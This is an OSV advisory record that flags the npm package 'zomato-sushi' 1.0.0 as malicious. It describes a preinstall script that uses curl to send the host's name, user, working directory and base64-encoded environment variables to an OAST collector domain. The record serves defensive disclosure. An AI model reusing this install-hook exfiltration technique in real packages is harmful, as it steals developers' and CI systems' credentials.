{"id":"MAL-2026-6254","summary":"Malicious code in zomato-sushi (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (6f631d7af366bbb607f9088550a64939e395d0ce1199777828269de5772d860c)\npackage.json declares a preinstall script that runs curl with form-encoded fields carrying the installer's hostname (`hostname -f`), `whoami`, current working directory, and a base64-encoded dump of the entire process environment (`env | base64 -w0`) over plain HTTP to an Interactsh/OAST out-of-band collector at `d8s0b82plbq3u5sb2vo0sb3a9obr4yjt7.oast.site`. A preuninstall hook beacons the same host. This fires automatically on `npm install` with no user opt-in. The bulk environment dump captures any secrets present in the shell at install time, including CI tokens, NPM_TOKEN, AWS_* keys, and similar credentials. The package name mimics Zomato's design system namespace and the shipped index.js is a stub with no functionality, consistent with a reconnaissance/credential-capture lure rather than a real library.\n\n## Source: ossf-package-analysis (d19be1ee4f53b1ec4844c228d9522d737756870743ef43a9d00816950b449233)\nThe OpenSSF Package Analysis project identified 'zomato-sushi' @ 1.0.0 (npm) as malicious.\n\nIt is considered malicious because:\n\n- The package communicates with a domain associated with malicious activity.\n\n- The package executes one or more commands associated with malicious behavior.\n","modified":"2026-06-22T18:31:22.938725507Z","published":"2026-06-21T16:11:12Z","database_specific":{"malicious-packages-origins":[{"modified_time":"2026-06-21T16:11:12Z","sha256":"d19be1ee4f53b1ec4844c228d9522d737756870743ef43a9d00816950b449233","source":"ossf-package-analysis","versions":["1.0.0"],"import_time":"2026-06-21T16:38:03.002679704Z"},{"modified_time":"2026-06-22T17:42:31Z","sha256":"6f631d7af366bbb607f9088550a64939e395d0ce1199777828269de5772d860c","source":"amazon-inspector","versions":["1.0.0"],"import_time":"2026-06-22T18:25:28.96204688Z","id":"IN-MAL-2026-007149"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/zomato-sushi/v/1.0.0"}],"affected":[{"package":{"name":"zomato-sushi","ecosystem":"npm","purl":"pkg:npm/zomato-sushi"},"versions":["1.0.0"],"database_specific":{"cwes":[{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/zomato-sushi/MAL-2026-6254.json","indicators":{"evidence_files":[{"sha256":"59733c4859d2b7323d7d5e3512e306c9bb3b27ee3ab73150d7f662efe023d1e9","path":"package.json","tlsh":"a401893679389623bdcc4770bd5a24293c612f4f88352c049b9f222ec28f255237e622"}],"package_integrity":[{"hashes":{"sha1":"7535041b8d1508abb2b3ee1b22e332da992a3546","sha512_sri":"sha512-flCjZerwq7C0NTeufuIWAfWqlzVV+UdBAjpodCWEQ7LA8ddiMn49z5RdFMxKTj8W8S9Asf+fqGRb64P8IA4aGw=="},"filename":"zomato-sushi-1.0.0.tgz"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"},{"name":"OpenSSF: Package Analysis","contact":["https://github.com/ossf/package-analysis","https://openssf.slack.com/channels/package_analysis"],"type":"FINDER"}]}